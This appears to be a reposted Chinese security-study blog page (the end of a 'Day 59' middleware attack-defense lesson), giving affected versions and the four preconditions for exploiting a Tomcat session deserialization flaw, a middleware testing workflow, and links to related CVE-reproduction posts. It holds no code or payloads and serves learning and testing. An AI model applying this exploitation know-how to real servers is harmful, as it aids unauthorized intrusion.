Apache Tomcat 10.x < 10.0.0-M5 / 9.x < 9.0.35 / 8.x < 8.5.55 / 7.x < 7.0.104

此漏洞利用條件非常苛刻,研究意義不大,成功利用此漏洞需同時(shí)滿足以下4個(gè)條件:

1.攻擊者能夠控制服務(wù)器上文件的內(nèi)容和文件名稱

2.服務(wù)器PersistenceManager配置中使用了FileStore

3.PersistenceManager中的sessionAttributeValueClassNameFilter被配置為“null”,或者過濾器不夠嚴(yán)格,導(dǎo)致允許攻擊者提供反序列化數(shù)據(jù)的對(duì)象

4.攻擊者知道使用的FileStore存儲(chǔ)位置到攻擊者可控文件的相對(duì)路徑

四.總結(jié)

????????本次學(xué)習(xí)內(nèi)容較多,都是平時(shí)接觸比較多的中間件,在這里花費(fèi)的時(shí)間會(huì)較多。對(duì)中間件漏洞測(cè)試一般還是探測(cè)端口——>判斷中間件類型——>根據(jù)類型選擇測(cè)試方向(特定漏洞or弱口令or未授權(quán)等)

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx

第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,網(wǎng)絡(luò)安全,安全,apache,tomcat,中間件,nginx文章來源地址http://www.zghlxwxcb.cn/news/detail-829911.html

到了這里,關(guān)于第59天-服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 中間件安全-CVE復(fù)現(xiàn)&Weblogic&Jenkins&GlassFish漏洞復(fù)現(xiàn)

    中間件安全-CVE復(fù)現(xiàn)&Weblogic&Jenkins&GlassFish漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,F(xiàn)lask,jQuery等 1、中間件-Weblogic安全 2、中間件-JBoos安全 3、中間件-Jenkins安全 4、中間件-GlassFish安全 常見中間件的安全測(cè)試: 1、配置

    2024年02月08日
    瀏覽(19)
  • 中間件安全-CVE復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx漏洞復(fù)現(xiàn)

    中間件安全-CVE復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,F(xiàn)lask,jQuery等 1、中間件-IIS-短文件解析藍(lán)屏等 2、中間件-Nginx-文件解析命令執(zhí)行等 3、中間件-Apache-RCE目錄遍歷文件解析等 4、中間件

    2024年02月07日
    瀏覽(22)
  • 中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn)

    中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,F(xiàn)lask,jQuery 等。 中間件所披露的問題: 中間件安全-IISApacheTomcatNginx漏洞復(fù)現(xiàn) 中間件安全-WeblogicJenkinsGlassFish漏洞復(fù)現(xiàn) 1、中間

    2024年02月08日
    瀏覽(26)
  • 33、WEB攻防——通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    33、WEB攻防——通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    IIS爆過漏洞的版本:IIS6.0(windows server 2003)、IIS7.0和IIS7.5(windows server 2008) IIS6.0解析漏洞: 文件名:x.asp;x.jpg,jpg的文件后綴名,但是會(huì)被解析為asp文件; 目錄名:x.asp/x.jpg, 文件目錄名含有.asp后綴,x.jpg也會(huì)被解析為asp文件。 觸發(fā)條件: IIS6.0這個(gè)中間件; 上傳文件能不

    2024年01月24日
    瀏覽(31)
  • 小迪安全33WEB 攻防-通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    小迪安全33WEB 攻防-通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    # 知識(shí)點(diǎn): 1 、中間件安全問題 2 、中間件文件上傳解析 3 、 Web 應(yīng)用編輯器上傳 編輯器也就是第三方插件,一般都是文件上傳漏洞 # 詳細(xì)點(diǎn): 1 、檢測(cè)層面:前端,后端等 2 、檢測(cè)內(nèi)容:文件頭,完整性,二次渲染等 3 、檢測(cè)后綴:黑名單,白名單, MIME 檢測(cè)等 4 、繞過技

    2024年03月16日
    瀏覽(32)
  • day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全

    day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全

    先自我介紹一下,小編浙江大學(xué)畢業(yè),去過華為、字節(jié)跳動(dòng)等大廠,目前阿里P7 深知大多數(shù)程序員,想要提升技能,往往是自己摸索成長(zhǎng),但自己不成體系的自學(xué)效果低效又漫長(zhǎng),而且極易碰到天花板技術(shù)停滯不前! 因此收集整理了一份《2024年最新網(wǎng)絡(luò)安全全套學(xué)習(xí)資料》

    2024年04月24日
    瀏覽(49)
  • day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全(1)

    day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全(1)

    2、解析漏洞-nginx.conf 配置不當(dāng) 二,Web 應(yīng)用編輯器-Ueditor 文件上傳安全 三,實(shí)例 CMS平臺(tái)-中間件解析編輯器引用 配套資源下載(百度網(wǎng)盤): 鏈接:https://pan.baidu.com/s/11Q9sAPQ9P_ReOP9PKL0ABg?pwd=jgg4? 提取碼:jgg4 本章節(jié)知識(shí)點(diǎn): 1 、中間件安全問題 2 、中間件文件上傳解析 3 、

    2024年04月15日
    瀏覽(28)
  • tomcat中間件漏洞復(fù)現(xiàn)

    tomcat中間件漏洞復(fù)現(xiàn)

    Tomcat是Apache 軟件基金會(huì)(Apache Software Foundation)的Jakarta 項(xiàng)目中的一個(gè)核心項(xiàng)目,由Apache、Sun 和其他一些公司及個(gè)人共同開發(fā)而成。由于有了Sun 的參與和支持,最新的Servlet 和JSP 規(guī)范總是能在Tomcat 中得到體現(xiàn),Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 規(guī)范。因?yàn)門omcat 技術(shù)先進(jìn)、性

    2024年02月10日
    瀏覽(23)
  • 【精選】中間件 tomcat漏洞復(fù)現(xiàn)

    【精選】中間件 tomcat漏洞復(fù)現(xiàn)

    目錄 1、tomcat后臺(tái)弱口令漏洞利用 利用冰蝎連接: 2、tomcat遠(yuǎn)程代碼執(zhí)行漏洞 利用冰蝎子連接: 利用冰蝎連接: 靶場(chǎng): 124.70.71.251:49586 利用冰蝎的 shell.jsp 文件 利用冰蝎子連接:

    2024年01月21日
    瀏覽(24)
  • express中間件當(dāng)做前端服務(wù)器的安全漏洞處理

    使用express當(dāng)做node服務(wù)器時(shí),發(fā)現(xiàn)安全漏洞,記錄處理步驟: PS:以下安全內(nèi)容處理,需要使用到redis進(jìn)行會(huì)話存儲(chǔ)、請(qǐng)求計(jì)數(shù)、請(qǐng)求唯一限制等。為盡量確保開發(fā)環(huán)境與部署環(huán)境一致,請(qǐng)開發(fā)環(huán)境安裝并啟動(dòng)Redis服務(wù)。 ** 此文檔只是說明記錄關(guān)鍵步驟。具體實(shí)現(xiàn)代碼可參照附

    2024年03月27日
    瀏覽(28)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包